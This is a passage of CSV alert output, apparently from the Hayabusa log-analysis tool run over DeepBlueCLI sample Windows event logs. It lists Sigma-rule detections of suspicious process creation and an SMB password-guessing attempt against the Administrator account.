Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:12.129 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:06.519 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 03:52:09.234 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 18:48:20.558 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 23:01:04.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 06:03:24.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- +2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 